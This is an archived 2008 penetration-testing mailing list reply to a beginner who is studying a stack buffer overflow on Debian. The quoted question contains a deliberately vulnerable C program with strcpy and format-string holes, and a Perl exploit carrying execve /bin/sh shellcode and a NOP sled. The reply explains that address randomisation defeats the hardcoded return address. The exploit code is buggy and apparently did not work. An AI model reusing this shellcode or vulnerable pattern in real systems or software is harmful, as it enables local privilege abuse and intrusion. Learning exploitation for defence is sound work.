Penetration Testing mailing list archives
Re: Simple Buffer Overflow
From: "Ronald van der Westen" <rvdwesten () gmail com>
Date: Mon, 14 Jan 2008 15:11:32 +0100
Debian 2.6.18 is using Address Space Randomization, this means that your stack will be at another address every run. It is not possible to exploit this with a hardcoded return address. Cheers, -p On 10 Jan 2008 02:09:46 -0000, <loki6 () orange nl> wrote:
Hi there and thank you for reading this, I'm new in the pen-test area and want to study a simple buffer overflow exploit on debian 2.6.18-5-686. As I've said I'm new to this field and my goal is to be able to anticipate on possible buffer overflow exploits. I've created this simple script: "test.c" : [code] #include <stdio.h> int main(int argc, char **argv){ char buffer[256]; if (argc == 1) { printf("Usage: %s (input)", argv[0]); } strcpy(buffer, argv[1]); printf(buffer); return 0; } [/code] Then I'm trying to exploit it with: [code] #!/usr/bin/perl $ret = "/x90/x9a/xbf"; $shellcode = "\xb0\x0b". "\x99". "\x52". "\x68\x2f\x2f\x73\x68". "\x68\x2f\x62\x69\x6e". "\x89\xe3". "\x52". "\x53". "\x89\xe1". "\xcd\x80"; $exploit = "\x90" x 235; $exploit .= $shellcode; $exploit .= $ret; system("./a.out $exploit"); [/code] The shellcode is an execve /bin/sh. When I run the perl script it simply returns my bash prompt. So the exploit didn't work. When I type 'exit' afterwards, I'm dropped from my su shell I was in previously, confirming there isn't a "/bin/sh" process. Now the funny thing is when I overflow the buffer of a.out in gdb, with: run `perl -e 'print "A"x262'` Program received signal SIGSEGV, Segmentation fault 0x08048412 in main () It doesn't overflow the EIP, because when I use: i r It says: eip 0x8048412 0x8048412 <main+126> The first time I tried today it overflowed the EIP correctly and I didn't change anything. ECX is 0x41414141 and ESP is 0x4141413d EBP is 0xbf004141 Since stack and frame pointer both have 41 in them I figure part of them is overflowed. Why not the Extended Instruction Pointer? I was wondering if someone was able to help me with this, because I really want to get the hang of this. I don't know if I got the NOP sled and return address right either, because when using GDB: x/s $esp I get: 0x4141413d: <Address 0x4141413d out of bounds I'm kinda stuck from there. My problem in short: - How do I get a reliable return address with GDB - How do I determine the length of the NOP sled - How do I test shellcode Thanks for reading this.. Thanks for any help, pointers and advice. ironmonkey6 ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
-- Ronald van der Westen ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Simple Buffer Overflow loki6 (Jan 10)
- Re: Simple Buffer Overflow Sanjay R (Jan 14)
- Re: Simple Buffer Overflow Ronald van der Westen (Jan 14)
- <Possible follow-ups>
- Re: Simple Buffer Overflow Siim Põder (Jan 15)